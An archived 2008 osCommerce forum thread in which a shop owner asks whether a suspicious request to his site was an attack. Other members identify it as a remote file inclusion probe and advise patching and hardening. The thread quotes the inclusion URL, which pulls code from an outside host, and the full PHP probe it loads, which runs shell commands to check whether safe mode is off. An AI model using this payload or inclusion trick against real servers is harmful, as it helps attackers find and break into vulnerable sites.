Benjjj6 Posted March 25, 2008 Posted March 25, 2008 Hi This is the second time I have viewed someone via the Whos Online section of my site viewing this type of page. It showed them viewing this page "/index.php?c=http://gracegallery-stonefurniture.com/test_1.txt??" Is this some kind of scan of my site? Should I be worried about it? Could someone view the test_1.txt file on that site and tell me if there is anything malicious in there? Thanks, Ben
Guest Posted March 26, 2008 Posted March 26, 2008 Hi This is the second time I have viewed someone via the Whos Online section of my site viewing this type of page. It showed them viewing this page "/index.php?c=http://gracegallery-stonefurniture.com/test_1.txt??" Is this some kind of scan of my site? Should I be worried about it? Could someone view the test_1.txt file on that site and tell me if there is anything malicious in there? Thanks, Ben If you did not put the file there, delete it and make sure you have applied all of the security updates.
Benjjj6 Posted March 26, 2008 Author Posted March 26, 2008 Sorry, I guess I didn't explain myself fully. The file "test_1.txt??" is not hosted on my server, but rather on the server that the customer came from. On my site they were viewing this page: http://www.mysite.com/index.php?c=http://gracegallery-stonefurniture.com/test_1.txt?? I have no relation to gracegallery-stonefurniture.com and am not sure why they would have input this URL. The .txt file contained this: <html><head><title>/\/\/\ Response CMD /\/\/\</title></head><body bgcolor=DC143C> <H1>Changing this CMD will result in corrupt scanning !</H1> </html></head></body> <?php if((@eregi("uid",ex("id"))) || (@eregi("Windows",ex("net start")))){ echo("Safe Mode of this Server is : "); echo("SafemodeOFF"); } else{ ini_restore("safe_mode"); ini_restore("open_basedir"); if((@eregi("uid",ex("id"))) || (@eregi("Windows",ex("net start")))){ echo("Safe Mode of this Server is : "); echo("SafemodeOFF"); }else{ echo("Safe Mode of this Server is : "); echo("SafemodeON"); } } function ex($cfe){ $res = ''; if (!empty($cfe)){ if(function_exists('exec')){ @exec($cfe,$res); $res = join("\n",$res); } elseif(function_exists('shell_exec')){ $res = @shell_exec($cfe); } elseif(function_exists('system')){ @ob_start(); @system($cfe); $res = @ob_get_contents(); @ob_end_clean(); } elseif(function_exists('passthru')){ @ob_start(); @passthru($cfe); $res = @ob_get_contents(); @ob_end_clean(); } elseif(@is_resource($f = @popen($cfe,"r"))){ $res = ""; while(!@feof($f)) { $res .= @fread($f,1024); } @pclose($f); } } return $res; } exit; Is there anything malicious in this code? I hope that explained the situation better :thumbsup:
Guest Posted March 26, 2008 Posted March 26, 2008 As far as I know it is an attempt to look for an old hole in osC. Just type the whole url into your browser. If a page or something comes up then you are in trouble. If you get a 403 or 404 error then you are okay. <--- as far as I know. http://www.yourdomain.com/index.php?c=http...com/test_1.txt?? Always make sure you have the latest version and the latest updates installed.
Benjjj6 Posted March 26, 2008 Author Posted March 26, 2008 It just loads the home page index.php As I have Ultimate SEO URL's installed and I believe the latest update redirects any products that no longer exists (403 or 404 errors) to the homepage I think it means I am ok. :) Thanks for your help Peter!
Guest Posted March 26, 2008 Posted March 26, 2008 It just loads the home page index.php As I have Ultimate SEO URL's installed and I believe the latest update redirects any products that no longer exists (403 or 404 errors) to the homepage I think it means I am ok. :) Thanks for your help Peter! Just ensure that you have all the latest security patches if you are not using 2.2rc2a
Benjjj6 Posted March 26, 2008 Author Posted March 26, 2008 Ok, I'm using the prvious version of OsCommerce before RC1 - where could I find these security patches? thankyou too Leslie :)
Guest Posted March 26, 2008 Posted March 26, 2008 Just ensure that you have all the latest security patches if you are not using 2.2rc2a I would also install the Security Pro contribution (cleanses the $GET) and Site Monitor (makes it much easier to find out what files have been added or altered on your site) and make sure all directories are 755 including images. Also make sure your robots.txt file is secure if you use one (another contribution), rename your admin, etc.
Guest Posted March 26, 2008 Posted March 26, 2008 Ok, I'm using the prvious version of OsCommerce before RC1 - where could I find these security patches? thankyou too Leslie :) You will need to download RC2a and look in the extras folder. My tip would be to do one at a time, and test it. Always backup first.
arietis Posted March 26, 2008 Posted March 26, 2008 Is there anything malicious in this code? there doesn't appear to be anything malicious in the code. that is, it won't do anything to hurt you. however, it's still bad. it looks to me like it's an attempt to determine which system services are running. it uses the unix id or the windows net start command to do this. then, the list of these services is returned as a text file. this could be used by a hacker to determine which attacks can be used to hack into the server. so by itself it's not bad, but the information that it reports could show someone that you're vulnerable to an attack. best to be sure that the attempt gives no information to the would-be hacker. the less information he has about you, the safer you are.
New 
Recommended Posts
Archived
This topic is now archived and is closed to further replies.